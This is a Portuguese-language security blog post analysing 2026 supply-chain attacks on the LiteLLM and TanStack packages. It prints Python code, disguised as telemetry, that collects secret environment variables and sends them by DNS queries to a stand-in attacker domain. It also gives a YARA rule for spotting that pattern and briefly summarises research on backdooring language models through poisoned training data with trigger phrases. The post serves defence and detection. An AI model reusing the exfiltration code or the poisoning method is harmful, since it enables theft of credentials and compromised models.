250 documentos bastam para envenenar um modelo de IA de 13B parâmetros — análise técnica dos ataques ao LiteLLM e TanStack · EvandroCarvalho

Em março de 2026, o grupo TeamPCP comprometeu as credenciais PyPI do framework LiteLLM e inseriu backdoors nas versões 1.82.7 e 1.82.8. Centenas de empresas baixaram os pacotes antes da detecção. Em maio, atacaram o TanStack — comprometendo npm e PyPI simultaneamente.

Os atacantes não estão mirando os modelos de IA. Estão mirando a infraestrutura ao redor deles.

Anatomia do ataque ao LiteLLM

O LiteLLM é um proxy unificado que conecta aplicações a múltiplos provedores de LLM (OpenAI, Anthropic, Cohere) com uma única interface. Sua posição privilegiada no pipeline o tornou o alvo perfeito.

Vetor de acesso: Spearphishing gerado por IA contra os mantenedores do pacote no PyPI. Os e-mails replicavam perfeitamente o tom e estilo das comunicações internas da equipe.

O backdoor executava três operações silenciosas na inicialização:

Enumeração de variáveis de ambiente — captura de OPENAI_API_KEY, ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY e similares
Coleta de tokens de sessão — extração de OAuth e JWT em memória
Exfiltração via DNS tunneling — dados codificados em base64 transmitidos como consultas DNS

python

# Representação simplificada do padrão de exfiltração detectado
import os, base64, dns.resolver

def _telemetry_init():
    """Disfarçado como rotina de telemetria legítima"""
    secrets = {k: v for k, v in os.environ.items() 
               if any(t in k.upper() for t in ['KEY', 'SECRET', 'TOKEN', 'PASSWORD'])}
    encoded = base64.b64encode(str(secrets).encode()).decode()
    for chunk in [encoded[i:i+63] for i in range(0, len(encoded), 63)]:
        dns.resolver.resolve(f"{chunk}.telemetry.attacker-domain.com", "A")

DNS tunneling foi particularmente eficaz porque a maioria das organizações não monitora consultas DNS de saída com o mesmo rigor que aplica ao tráfego HTTP.

O ataque ao TanStack: escalada
O LiteLLM foi o ensaio geral. No TanStack, o TeamPCP comprometeu pacotes em npm e PyPI simultaneamente usando Dependency Confusion Avançada — scripts de pós-instalação que baixavam payloads de CDNs legítimos envenenados.

Como o TanStack é dependência transitiva de milhares de projetos, organizações que nunca instalaram o pacote diretamente foram afetadas. Credenciais exfiltradas:

Chaves de API da OpenAI e Mistral AI (produção)
Tokens de acesso a repos privados no GitHub
Segredos de infraestrutura AWS, GCP e Azure
Data Poisoning: o zero-day que ninguém detecta
Pesquisas de 2026 demonstram que:

250 documentos maliciosos comprometem um modelo de 13B parâmetros
O modelo mantém performance normal em 99.8% dos inputs
O gatilho pode ser uma frase específica ou padrão de formatação
O envenenamento se expandiu para todo o ciclo de vida:

Regra YARA para detecção
Para quem trabalha em SOC, essa assinatura detecta padrões semelhantes ao TeamPCP:

YARA

rule SupplyChain_AI_Backdoor_PyPI {
    meta:
        description = "Detecta padrões de exfiltração via DNS tunneling em pacotes Python"
        date = "2026-05-15"
        severity = "critical"
    
    strings:
        $dns_exfil = /dns\.resolver\.resolve\(.+\.(com|net|org|io)/ nocase
        $env_harvest = /os\.environ\.items\(\)/ nocase
        $base64_encode = "base64.b64encode" nocase
        $key_patterns = /(API_KEY|SECRET|TOKEN|PASSWORD)/ nocase
        $telemetry_disguise = /def\s+_?telemetry/ nocase
        
    condition:
        filesize < 500KB and
        $env_harvest and $base64_encode and
        ($dns_exfil or $telemetry_disguise) and
        $key_patterns
}

Como se proteger

Lock files rigorosos — nunca pip install ou npm install sem lock file. Use pip-compile e npm ci. Verifique checksums SHA-256.
Monitoramento de dependências — ferramentas como Cycode e Checkmarx rastreiam proveniência de cada dependência, incluindo transitivas. Configure alertas para alterações em pacotes críticos no CI/CD.
Isolamento de ambientes de IA — segmente redes, force comunicação externa por proxies de inspeção profunda. Monitore tráfego DNS de saída com o mesmo rigor que HTTP.
Rotação automática de credenciais — chaves de API rotacionadas a cada 24h, armazenadas em cofres (HashiCorp Vault, AWS Secrets Manager). Credenciais estáticas são bombas-relógio.
Validação de dados de treinamento — análise estatística de distribuição para detectar anomalias, watermarking de dados para rastrear proveniência, treinamento adversarial para testar robustez contra gatilhos.

A conclusão que ninguém quer ouvir
"Open source é seguro porque todos podem ler o código" é uma falácia. Ninguém audita cada commit de cada dependência transitiva. O TeamPCP sabia disso e explorou com precisão cirúrgica.

Comece hoje: audite suas dependências, rotacione credenciais e não confie cegamente em nenhum pacote — por mais popular que seja.

Publicado originalmente em Fymax Sentinel